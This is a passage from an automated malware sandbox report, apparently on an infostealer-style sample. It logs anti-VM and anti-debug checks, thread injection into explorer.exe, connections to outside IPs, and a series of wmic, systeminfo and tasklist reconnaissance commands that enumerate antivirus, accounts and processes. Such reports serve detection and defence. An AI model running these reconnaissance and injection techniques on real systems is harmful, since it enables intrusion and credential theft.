                Source: C:\Windows\explorer.exe TID: 5784Thread sleep count: 440 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5672Thread sleep count: 1411 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5672Thread sleep time: -141100s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6788Thread sleep count: 622 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6788Thread sleep time: -62200s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 3192Thread sleep count: 323 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1352Thread sleep count: 313 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1352Thread sleep time: -31300s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6968Thread sleep count: 290 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 2820Thread sleep count: 96 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1292Thread sleep count: 128 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3292Thread sleep count: 160 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1076Thread sleep count: 37 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5672Thread sleep count: 1302 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5672Thread sleep time: -130200s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 2788Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 5692Thread sleep count: 2919 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 5692Thread sleep time: -2919000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1656Thread sleep count: 2564 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1656Thread sleep time: -2564000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe TID: 4436Thread sleep count: 4321 > 30
                Source: C:\Windows\SysWOW64\explorer.exe TID: 4436Thread sleep time: -4321000s >= -30000s
                Source: C:\Windows\explorer.exe TID: 4752Thread sleep count: 4229 > 30
                Source: C:\Windows\explorer.exe TID: 4752Thread sleep time: -4229000s >= -30000s
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Temp\B575.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Local\Temp\B575.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB87FB34 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,8_2_00007FF7CB87FB34
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03272B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,9_2_03272B15
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03273ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,9_2_03273ED9
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03271D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,9_2_03271D4A
                Source: C:\Windows\explorer.exeCode function: 11_2_001D30A8 FindFirstFileW,FindNextFileW,FindClose,11_2_001D30A8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03276512 GetSystemInfo,9_2_03276512
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                Source: 7020.tmp.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 7020.tmp.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: explorer.exe, 00000002.00000000.2123559301.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                Source: 7020.tmp.9.drBinary or memory string: global block list test formVMware20,11696428655
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2999912401.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2999912401.00000000035DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 7020.tmp.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 7020.tmp.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 7020.tmp.9.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                Source: 7020.tmp.9.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: 7020.tmp.9.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 7020.tmp.9.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 7020.tmp.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: explorer.exe, 00000002.00000000.2125128556.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                Source: 7020.tmp.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: explorer.exe, 00000002.00000000.2124263465.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                Source: 7020.tmp.9.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2125128556.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 7020.tmp.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: explorer.exe, 00000002.00000000.2125128556.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                Source: 7020.tmp.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2124263465.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                Source: 7020.tmp.9.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 7020.tmp.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 7020.tmp.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 7020.tmp.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 7020.tmp.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: B575.exe, 00000008.00000002.4536563179.000002EC777EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                Source: 7020.tmp.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 7020.tmp.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 7020.tmp.9.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 7020.tmp.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: ROUTE.EXE, 00000021.00000002.3366799924.000002C0188B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 7020.tmp.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 7020.tmp.9.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 7020.tmp.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 7020.tmp.9.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: 7020.tmp.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: explorer.exe, 00000002.00000000.2124263465.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                Source: 7020.tmp.9.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 7020.tmp.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: B575.exe, 00000008.00000002.4536563179.000002EC777EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fo & echo 2843835231311335232843835231\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77023-AAOEM\r\nOriginal Install Date: 03/10/2023, 10:57:18\r\nSystem Boot Time: 24/09/2023, 16:13:49\r\nSystem Manufacturer: VacWyv9nX5Hvulv\r\nSystem Model: nkTukOKS\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: LXNC3 5EM7Z, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'919 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'170 MB\r\nVirtual Memory: In Use: 1'021 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: YEkCP\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.5\r\n [02]: fe80::357a:d50d:a849:be2d\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n2843835231311335232843835231\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp> Record . . . : 116.58.10.60
                Source: explorer.exe, 00000002.00000000.2124263465.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                Source: 7020.tmp.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: explorer.exe, 00000002.00000000.2123559301.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03221B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,12_2_03221B17
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03221016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,12_2_03221016
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB8778EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,8_2_00007FF7CB8778EC
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_0260092B mov eax, dword ptr fs:[00000030h]0_2_0260092B
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_02600D90 mov eax, dword ptr fs:[00000030h]0_2_02600D90
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_0266F20B push dword ptr fs:[00000030h]0_2_0266F20B
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_0252092B mov eax, dword ptr fs:[00000030h]4_2_0252092B
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_02520D90 mov eax, dword ptr fs:[00000030h]4_2_02520D90
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_026DEB13 push dword ptr fs:[00000030h]4_2_026DEB13
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_024E092B mov eax, dword ptr fs:[00000030h]6_2_024E092B
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_024E0D90 mov eax, dword ptr fs:[00000030h]6_2_024E0D90
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_0267EDE3 push dword ptr fs:[00000030h]6_2_0267EDE3
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_024A092B mov eax, dword ptr fs:[00000030h]7_2_024A092B
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_024A0D90 mov eax, dword ptr fs:[00000030h]7_2_024A0D90
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_025FEC0B push dword ptr fs:[00000030h]7_2_025FEC0B
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB872654 GetProcessHeap,RtlReAllocateHeap,8_2_00007FF7CB872654

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Benign windows process drops PE files
                Source: C:\Windows\explorer.exeFile created: uejbbri.2.drJump to dropped file
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 116.58.10.60 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 190.98.23.157 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.162 443Jump to behavior
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeThread created: C:\Windows\explorer.exe EIP: 12319A8Jump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriThread created: unknown EIP: 88519A8Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeThread created: unknown EIP: 8381970Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriThread created: unknown EIP: 2FF1970Jump to behavior
                Injects code into the Windows Explorer (explorer.exe)
                Source: C:\Windows\explorer.exeMemory written: PID: 1684 base: A279C0 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 6760 base: 7FF6747E2D10 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 1532 base: A279C0 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 6432 base: 7FF6747E2D10 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 3304 base: A279C0 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 5008 base: 7FF6747E2D10 value: 90Jump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A279C0Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A279C0Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: A279C0Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe16_2_03091016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe16_2_030910A5
                Source: C:\Users\user\AppData\Local\Temp\B575.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csvJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csvJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydnsJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csvJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
